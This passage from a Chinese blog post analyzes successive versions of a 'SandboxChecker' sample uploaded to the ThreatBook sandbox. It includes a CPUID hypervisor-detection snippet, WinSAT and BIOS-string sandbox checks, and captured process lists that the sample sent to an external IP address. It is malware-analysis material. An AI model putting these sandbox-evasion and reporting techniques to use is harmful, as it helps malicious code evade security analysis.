PID: 3916\nProcess Name: svchost.exe, PID: 4952\nProcess Name: svchost.exe, PID: 6028\nProcess Name: WeChat.exe, PID: 6092\nProcess Name: PWTXIkBXCb.exe, PID: 2432\nProcess Name: unsecapp.exe, PID: 3608\nProcess Name: ShellExperienceHost.exe, PID: 2204\nProcess Name: svchost.exe, PID: 4004\nProcess Name: persfw.exe, PID: 3212\nProcess Name: svchost.exe, PID: 2636\nProcess Name: QQ.exe, PID: 3524\nProcess Name: SafeDogGuardCenter.exe, PID: 5984\nProcess Name: sihost.exe, PID: 1848\nProcess Name: backgroundTaskHost.exe, PID: 2824\nProcess Name: Detonate.exe, PID: 5812\nProcess Name: BgackgroundTransferHost.exe, PID: 5040\nProcess Name: RemindersServer.exe, PID: 3884\nProcess Name: vba32lder.exe, PID: 5612\nProcess Name: wrctrl.exe, PID: 1336\nProcess Name: safedog.exe, PID: 6032\nProcess Name: SafeDogSiteIIS.exe, PID: 5652\nProcess Name: SafeDogServerUI.exe, PID: 1948\nProcess Name: GoogleUpdate.exe, PID: 5856\nProcess Name: audiodg.exe, PID: 4312\nProcess Name: taskhostw.exe, PID: 2640\nProcess Name: WUDFHost.exe, PID: 1524\nProcess Name: SafeDogGuardCenter.exe, PID: 5188\nProcess Name: WmiPrvSE.exe, PID: 6064\nProcess Name: GoogleUpdateSetup.exe, PID: 6004\nProcess Name: SafeDogTray.exe, PID: 2652\nProcess Name: safedogupdatecenter.exe, PID: 4988\nProcess Name: svchost.exe, PID: 1924\nProcess Name: ShellExperienceHost.exe, PID: 672\nProcess Name: RuntimeBroker.exe, PID: 6184\nProcess Name: svchost.exe, PID: 6996\nProcess Name: SandboxCheck.exe, PID: 6352\nProcess Name: conhost.exe, PID: 6312\n\n```\n\n> 以下内容为奇思妙想内容\n\nWinSAT的信息似乎不会改变,是不是可以通过比对哈希来查看是否为微步虚拟机呢?\n\n![](../img/TBSandbox-Day2/image-20240405164335823.png)\n\n\n\n## SandboxChecker V1.2.1\n\n![](../img/TBSandbox-Day2/image-20240405170635549.png)\n\n间隔20分钟的程序,只是多了个打开计算器`ShellExecuteW(0i64, L\"open\", L\"calc.exe\", 0i64, 0i64, 1);`\n\n查询作者精神状态,,,,\n\n\n\n## SandboxChecker V1.3.0\n\n![](../img/TBSandbox-Day2/image-20240405164952900.png)\n\n在历时一天后,作者似乎发现了新的大陆.但是为什么要切换到VS2008啊 我不能理解(\n\n![](../img/TBSandbox-Day2/image-20240405165228725.png)\n\n对的 作者开始察觉`C:\\Windows\\Performance\\WinSAT\\DataStore\\`隐藏着秘密,所以专门写了一个测试文件去检查目标文件是否存在并且回传到`117.50.179.15:4448`\n\n## SandboxChecker V1.3.1\n\n![](../img/TBSandbox-Day2/image-20240405165755925.png)\n\n![](../img/TBSandbox-Day2/image-20240405165954211.png)\n\n变化不大,简单的水一下过去了.\n\n## SandboxChecker V1.3.2\n\n![](../img/TBSandbox-Day2/image-20240405171157630.png)\n\nVS版本切换到了2015 看起来还在Debug程序的上传功能?\n\n![](../img/TBSandbox-Day2/image-20240405171119743.png)\n\n回传变更成了`117.50.179.15:4447`\n\n## SandboxChecker V1.3.3\n\n![](../img/TBSandbox-Day2/image-20240405171333235.png)\n\n![](../img/TBSandbox-Day2/image-20240405171442329.png)\n\n回传变更成了`117.50.179.15:4446`\n\n## SandboxChecker V1.4.0\n\n![](../img/TBSandbox-Day2/image-20240405173701737.png)\n\n1.4.0版本开始进军全新版本了\n\n![](../img/TBSandbox-Day2/image-20240405174029664.png)\n\n开始搜寻是否存在`Formal.Assessment (Initial).WinS`的文件与此文件中是否包含 `American Megatrends Inc.`\n\n如果存在则弹窗提示American Megatrends Inc.如果没有则打开计算器.\n\n## SandboxChecker V1.5.0   4月7日追踪更新版\n\n![](../img/TBSandbox-Day2/image-20240407131236283.png)\n\n凌晨两点,这小哥真的不睡觉的吗 功能变化不大,似乎与V1.2.0版本差不多,除了新增一个打开计算器\n\n![](../img/TBSandbox-Day2/image-20240407131407965.png)\n\n信息发送至`117.50.179.15:8086`\n\n```\nsystemInfo=Computer Name: DESKTOP-H9URB7T, CPU Cores: 4, Hard Drives: 2\nDirectory Contents: \ndesktop.ini\nMicrosoft Edge.lnk\n\nWinSAT: \n2021-01-26 03.06.25.993.winsat.etl\n2021-01-26 03.06.26.712 Cpu.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Disk.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 DWM.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Graphics3D.Assessment (Initial).WinSAT.xml\n2021-01-26 03.06.26.712 Mem.Assessment (Initial).WinSAT.xml\n2021-01-26 03.08.10.544 Formal.Assessment (Initial).WinSAT.xml\n\n网卡信息:\nRealtek RTL8139C+ Fast Ethernet NIC\n\n开启窗口数量:\n6\nProcess Name: [System Process], PID: 0\nProcess Name: System, PID: 4\nProcess Name: Registry, PID: 96\nProcess Name: smss.exe, PID: 324\nProcess Name: csrss.exe, PID: 444\nProcess Name: wininit.exe, PID: 520\nProcess Name: csrss.exe, PID: 568\nProcess Name: winlogon.exe, PID: 620\nProcess Name: services.exe, PID: 660\nProcess Name: lsass.exe, PID: 684\nProcess Name: svchost.exe, PID: 796\nProcess Name: svchost.exe, PID: 820\nProcess Name: fontdrvhost.exe, PID: 840\nProcess Name: fontdrvhost.exe, PID: 848\nProcess Name: svchost.exe, PID: 940\nProcess Name: svchost.exe, PID: 992\nProcess Name: dwm.exe, PID: 348\nProcess Name: svchost.exe, PID: 360\nProcess Name: svchost.exe, PID: 696\nProcess Name: svchost.exe, PID: 1060\nProcess Name: svchost.exe, PID: 1072\nProcess Name: svchost.exe, PID: 1108\nProcess Name: svchost.exe, PID: 1184\nProcess Name: svchost.exe, PID: 1232\nProcess Name: svchost.exe, PID: 1272\nProcess Name: svchost.exe, PID: 1280\nProcess Name: svchost.exe, PID: 1312\nProcess Name: svchost.exe, PID: 1320\nProcess Name: svchost.exe, PID: 1412\nProcess Name: svchost.exe, PID: 1440\nProcess Name: svchost.exe, PID: 1464\nProcess Name: svchost.exe, PID: 1500\nProcess Name: svchost.exe, PID: 1536\nProcess Name: svchost.exe, PID: 1564\nProcess Name: svchost.exe, PID: 1656\nProcess Name: svchost.exe, PID: 1756\nProcess Name: svchost.exe, PID: 1824\nProcess Name: svchost.exe, PID: 1840\nProcess Name: audiodg.exe, PID: 1980\nProcess Name: svchost.exe, PID: 1992\nProcess Name: svchost.exe, PID: 2044\nProcess Name: svchost.exe, PID: 1192\nProcess Name: svchost.exe, PID: 1432\nProcess Name: spoolsv.exe, PID: 2148\nProcess Name: svchost.exe, PID: 2244\nProcess Name: svchost.exe, PID: 2276\nProcess Name: svchost.exe, PID: 2476\nProcess Name: svchost.exe, PID: 2484\nProcess Name: svchost.exe, PID: 2492\nProcess Name: AcrylicService.exe, PID: 2500\nProcess Name: svchost.exe, PID: 2536\nProcess Name: svchost.exe, PID: 2564\nProcess Name: svchost.exe, PID: 2580\nProcess Name: svchost.exe, PID: 2592\nProcess Name: svchost.exe, PID: 2752\nProcess Name: svchost.exe, PID: 3020\nProcess Name: svchost.exe, PID: 2412\nProcess Name: svchost.exe, PID: 352\nProcess Name: svchost.exe, PID: 3084\nProcess Name: sihost.exe, PID: 3324\nProcess Name: svchost.exe, PID: 3352\nProcess Name: svchost.exe, PID: 3488\nProcess Name: ctfmon.exe, PID: 3520\nProcess Name: taskhostw.exe, PID: 3576\nProcess Name: explorer.exe, PID: 3792\nProcess Name: sppsvc.exe, PID: 3916\nProcess Name: svchost.exe, PID: 3984\nProcess Name: svchost.exe, PID: 4060\nProcess Name: ChsIME.exe, PID: 4080\nProcess Name: SppExtComObj.Exe, PID: 3956\nProcess Name: StartMenuExperienceHost.exe, PID: 4120\nProcess Name: svchost.exe, PID: 4128\nProcess Name: svchost.exe, PID: 4160\nProcess Name: svchost.exe, PID: 4248\nProcess Name: RuntimeBroker.exe, PID: 4368\nProcess Name: ApplicationFrameHost.exe, PID: 4672\nProcess Name: MicrosoftEdge.exe, PID: 4692\nProcess Name: browser_broker.exe, PID: 4816\nProcess Name: svchost.exe, PID: 4892\nProcess Name: dllhost.exe, PID: 4972\nProcess Name: Windows.WARP.JITService.exe, PID: 4984\nProcess Name: RuntimeBroker.exe, PID: 5088\nProcess Name: MicrosoftEdgeSH.exe, PID: 4428\nProcess Name: MicrosoftEdgeCP.exe, PID: 4460\nProcess Name: WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe, PID: 5264\nProcess Name: WeChat.exe, PID: 5536\nProcess Name: taskhostw.exe, PID: 5960\nProcess Name: svchost.exe, PID: 6120\nProcess Name: svchost.exe, PID: 4916\nProcess Name: TrustedInstaller.exe, PID: 5644\nProcess Name: TiWorker.exe, PID: 5500\nProcess Name: svchost.exe, PID: 2600\nProcess Name: WmiPrvSE.exe, PID: 4744\nProcess Name: WmiPrvSE.exe, PID: 6076\nProcess Name: WeChat.exe, PID: 5992\nProcess Name: svchost.exe, PID: 3940\nProcess Name: svchost.exe, PID: 5592\nProcess Name: MjUVfuNpXl.exe, PID: 1348\nProcess Name: unsecapp.exe, PID: 2896\nProcess Name: Detonate.exe, PID: 1372\nProcess Name: svchost.exe, PID: 1260\nProcess Name: GoogleUpdateSetup.exe, PID: 5244\nProcess Name: clamd.exe, PID: 1612\nProcess Name: svchost.exe, PID: 1684\nProcess Name: taskhostw.exe, PID: 2552\nProcess Name: RemindersServer.exe, PID: 2432\nProcess Name: backgroundTaskHost.exe, PID: 1936\nProcess Name: UniversalAVService.exe, PID: 4196\nProcess Name: audiodg.exe, PID: 1424\nProcess Name: EverythingServer.exe, PID: 4336\nProcess Name: WUDFHost.exe, PID: 4840\nProcess Name: GoogleUpdate.exe, PID: 5892\nProcess Name: WeChat.exe, PID: 3236\nProcess Name: sihost.exe, PID: 5200\nProcess Name: WmiPrvSE.exe, PID: 5192\nProcess Name: QQ.exe, PID: 2720\nProcess Name: ShellExperienceHost.exe, PID: 3244\nProcess Name: BackgroundTransferHost.exe, PID: 5520\nProcess Name: svchost.exe, PID: 5104\nProcess Name: ShellExperienceHost.exe, PID: 2548\nProcess Name: RuntimeBroker.exe, PID: 4240\nProcess Name: svchost.exe, PID: 5928\nProcess Name: SandboxCheck.exe, PID: 448\nProcess Name: conhost.exe, PID: 2272\nProcess Name: svchost.exe, PID: 4348\nProcess Name: calc.exe, PID: 464\n\n```\n\n\n\n\n\n## END\n\n就此似乎结束了 他没有更新新的东西\n\n他似乎发现了绕过微步的小技巧,但是总感觉这个技巧有点灵车)\n","slug":"TBSandbox-Day2","published":1,"updated":"2025-02-12T15:31:51.312Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bn00097dp830yu0c40","content":"<h1 id=\"微步沙箱分析-Day2\"><a href=\"#微步沙箱分析-Day2\" class=\"headerlink\" title=\"微步沙箱分析-Day2\"></a>微步沙箱分析-Day2</h1><p>这篇文章的兴趣来源是某位大哥在疯狂的上传SandboxChecker,所以我来按时间分析一下他的实验成果.</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405151713354.png\"></p>\n<h2 id=\"SandboxChecker-V1-0\"><a href=\"#SandboxChecker-V1-0\" class=\"headerlink\" title=\"SandboxChecker V1.0\"></a>SandboxChecker V1.0</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405153807865.png\"></p>\n<p>大概是最初的版本,只检测了CPU制造商和是否支持SSE</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405154224572.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405154400833.png\"></p>\n<h2 id=\"SandboxChecker-V1-1\"><a href=\"#SandboxChecker-V1-1\" class=\"headerlink\" title=\"SandboxChecker V1.1\"></a>SandboxChecker V1.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405154432457.png\"></p>\n<p>在经过40分钟后,又上传了新的SandboxChecker 我称之为V1.1 小版本号更新一下吧 虽然功能完全不一致</p>\n<p>V1.1版本则开始试图读取虚拟化信息了.</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405155035221.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405155019955.png\"></p>\n<p>但是这种检测方式还是比较容易绕过的Like:</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405160457432.png\"></p>\n<p>所以相对来说针对沙箱是无效的,所以我们来看一看更新的版本</p>\n<h2 id=\"SandboxChecker-V1-1-1\"><a href=\"#SandboxChecker-V1-1-1\" class=\"headerlink\" title=\"SandboxChecker V1.1.1\"></a>SandboxChecker V1.1.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405161340796.png\"></p>\n<p>哦,好吧. 我准备将V1.2版本号更改成V1.1.1 因为这个跟V1.1基本没有什么区别 只是改了一点点输出</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405161442896.png\"></p>\n<blockquote>\n<p>注:当 RAX 寄存器被设置为 0x40000000 时 CPUID 返回的信息是 “VMXh”（Virtual Machine eXtensions）这些信息用于检测 CPU 是否支持虚拟化技术。</p>\n</blockquote>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405161605646.png\"></p>\n<p>附代码:</p>\n<figure class=\"highlight c++\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs c++\"><span class=\"hljs-meta\">#<span class=\"hljs-keyword\">include</span> <span class=\"hljs-string\">&lt;iostream&gt;</span></span><br><span class=\"hljs-meta\">#<span class=\"hljs-keyword\">include</span> <span class=\"hljs-string\">&lt;cstring&gt;</span></span><br><br><span class=\"hljs-function\"><span class=\"hljs-type\">void</span> <span class=\"hljs-title\">cpuid</span><span class=\"hljs-params\">(<span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> op, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *eax, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *ebx, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *ecx, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *edx)</span> </span>&#123;<br>    __asm__(<br>            <span class=\"hljs-string\">&quot;cpuid;&quot;</span><br>            : <span class=\"hljs-string\">&quot;=a&quot;</span> (*eax), <span class=\"hljs-string\">&quot;=b&quot;</span> (*ebx), <span class=\"hljs-string\">&quot;=c&quot;</span> (*ecx), <span class=\"hljs-string\">&quot;=d&quot;</span> (*edx)<br>            : <span class=\"hljs-string\">&quot;a&quot;</span> (op)<br>            );<br>&#125;<br><br><span class=\"hljs-function\"><span class=\"hljs-type\">int</span> <span class=\"hljs-title\">main</span><span class=\"hljs-params\">()</span> </span>&#123;<br>    <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> eax, ebx, ecx, edx;<br><br>    <span class=\"hljs-comment\">// 查询扩展的 CPUID 信息</span><br>    <span class=\"hljs-built_in\">cpuid</span>(<span class=\"hljs-number\">0x40000000</span>, &amp;eax, &amp;ebx, &amp;ecx, &amp;edx);<br><br>    <span class=\"hljs-type\">char</span> signature[<span class=\"hljs-number\">13</span>] = &#123;<span class=\"hljs-number\">0</span>&#125;;<br>    <span class=\"hljs-built_in\">memcpy</span>(&amp;signature[<span class=\"hljs-number\">0</span>], &amp;ebx, <span class=\"hljs-number\">4</span>);<br>    <span class=\"hljs-built_in\">memcpy</span>(&amp;signature[<span class=\"hljs-number\">4</span>], &amp;ecx, <span class=\"hljs-number\">4</span>);<br>    <span class=\"hljs-built_in\">memcpy</span>(&amp;signature[<span class=\"hljs-number\">8</span>], &amp;edx, <span class=\"hljs-number\">4</span>);<br><br>    std::cout &lt;&lt; <span class=\"hljs-string\">&quot;VMXh: &quot;</span> &lt;&lt; signature &lt;&lt; std::endl;<br><br>    <span class=\"hljs-keyword\">return</span> <span class=\"hljs-number\">0</span>;<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n\n\n<h2 id=\"SandboxChecker-V1-2\"><a href=\"#SandboxChecker-V1-2\" class=\"headerlink\" title=\"SandboxChecker V1.2\"></a>SandboxChecker V1.2</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405161932160.png\"></p>\n<p>在历时8个小时后 又开始了新的尝试.本次代码变动比较大(我挺想叫他V2.0的)</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405162501691.png\"></p>\n<p>开始获取计算机名称,系统信息,磁盘信息.并且会遍历<code>C:\\Windows\\Performance\\WinSAT\\DataStore\\*</code>下所有文件 </p>\n<p>通过<code>CreateToolhelp32Snapshot</code>创建进程快照来遍历进程, 随后将获取到的信息发送至<code>117.50.179.15:8086</code></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405163028493.png\"></p>\n<p>抓包后内容:</p>\n<figure class=\"highlight yaml\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br><span class=\"line\">40</span><br><span class=\"line\">41</span><br><span class=\"line\">42</span><br><span class=\"line\">43</span><br><span class=\"line\">44</span><br><span class=\"line\">45</span><br><span class=\"line\">46</span><br><span class=\"line\">47</span><br><span class=\"line\">48</span><br><span class=\"line\">49</span><br><span class=\"line\">50</span><br><span class=\"line\">51</span><br><span class=\"line\">52</span><br><span class=\"line\">53</span><br><span class=\"line\">54</span><br><span class=\"line\">55</span><br><span class=\"line\">56</span><br><span class=\"line\">57</span><br><span class=\"line\">58</span><br><span class=\"line\">59</span><br><span class=\"line\">60</span><br><span class=\"line\">61</span><br><span class=\"line\">62</span><br><span class=\"line\">63</span><br><span class=\"line\">64</span><br><span class=\"line\">65</span><br><span class=\"line\">66</span><br><span class=\"line\">67</span><br><span class=\"line\">68</span><br><span class=\"line\">69</span><br><span class=\"line\">70</span><br><span class=\"line\">71</span><br><span class=\"line\">72</span><br><span class=\"line\">73</span><br><span class=\"line\">74</span><br><span class=\"line\">75</span><br><span class=\"line\">76</span><br><span class=\"line\">77</span><br><span class=\"line\">78</span><br><span class=\"line\">79</span><br><span class=\"line\">80</span><br><span class=\"line\">81</span><br><span class=\"line\">82</span><br><span class=\"line\">83</span><br><span class=\"line\">84</span><br><span class=\"line\">85</span><br><span class=\"line\">86</span><br><span class=\"line\">87</span><br><span class=\"line\">88</span><br><span class=\"line\">89</span><br><span class=\"line\">90</span><br><span class=\"line\">91</span><br><span class=\"line\">92</span><br><span class=\"line\">93</span><br><span class=\"line\">94</span><br><span class=\"line\">95</span><br><span class=\"line\">96</span><br><span class=\"line\">97</span><br><span class=\"line\">98</span><br><span class=\"line\">99</span><br><span class=\"line\">100</span><br><span class=\"line\">101</span><br><span class=\"line\">102</span><br><span class=\"line\">103</span><br><span class=\"line\">104</span><br><span class=\"line\">105</span><br><span class=\"line\">106</span><br><span class=\"line\">107</span><br><span class=\"line\">108</span><br><span class=\"line\">109</span><br><span class=\"line\">110</span><br><span class=\"line\">111</span><br><span class=\"line\">112</span><br><span class=\"line\">113</span><br><span class=\"line\">114</span><br><span class=\"line\">115</span><br><span class=\"line\">116</span><br><span class=\"line\">117</span><br><span class=\"line\">118</span><br><span class=\"line\">119</span><br><span class=\"line\">120</span><br><span class=\"line\">121</span><br><span class=\"line\">122</span><br><span class=\"line\">123</span><br><span class=\"line\">124</span><br><span class=\"line\">125</span><br><span class=\"line\">126</span><br><span class=\"line\">127</span><br><span class=\"line\">128</span><br><span class=\"line\">129</span><br><span class=\"line\">130</span><br><span class=\"line\">131</span><br><span class=\"line\">132</span><br><span class=\"line\">133</span><br><span class=\"line\">134</span><br><span class=\"line\">135</span><br><span class=\"line\">136</span><br><span class=\"line\">137</span><br><span class=\"line\">138</span><br><span class=\"line\">139</span><br><span class=\"line\">140</span><br><span class=\"line\">141</span><br><span class=\"line\">142</span><br><span class=\"line\">143</span><br><span class=\"line\">144</span><br><span class=\"line\">145</span><br><span class=\"line\">146</span><br><span class=\"line\">147</span><br><span class=\"line\">148</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs yaml\"><span class=\"hljs-string\">systemInfo=Computer</span> <span class=\"hljs-attr\">Name:</span> <span class=\"hljs-string\">DESKTOP-H9URB7T,</span> <span class=\"hljs-attr\">CPU Cores:</span> <span class=\"hljs-number\">4</span><span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">Hard Drives:</span> <span class=\"hljs-number\">2</span><br><span class=\"hljs-attr\">Directory Contents:</span> <br><span class=\"hljs-string\">desktop.ini</span><br><span class=\"hljs-string\">Microsoft</span> <span class=\"hljs-string\">Edge.lnk</span><br><br><span class=\"hljs-attr\">WinSAT:</span> <br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.25</span><span class=\"hljs-number\">.993</span><span class=\"hljs-string\">.winsat.etl</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Cpu.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Disk.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">DWM.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Graphics3D.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.06</span><span class=\"hljs-number\">.26</span><span class=\"hljs-number\">.712</span> <span class=\"hljs-string\">Mem.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><span class=\"hljs-number\">2021-01-26 </span><span class=\"hljs-number\">03.08</span><span class=\"hljs-number\">.10</span><span class=\"hljs-number\">.544</span> <span class=\"hljs-string\">Formal.Assessment</span> <span class=\"hljs-string\">(Initial).WinSAT.xml</span><br><br><span class=\"hljs-attr\">Process Name:</span> [<span class=\"hljs-string\">System</span> <span class=\"hljs-string\">Process</span>]<span class=\"hljs-string\">,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">0</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">System,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Registry,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">96</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">smss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">324</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">440</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">wininit.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">516</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">csrss.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">524</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">winlogon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">616</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">services.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">660</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">lsass.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">680</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">792</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">816</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">836</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">844</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">924</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">988</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dwm.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">508</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">812</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">656</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1088</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1096</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1160</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1164</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1184</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1236</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1296</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1380</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1392</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1416</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1452</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1516</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span 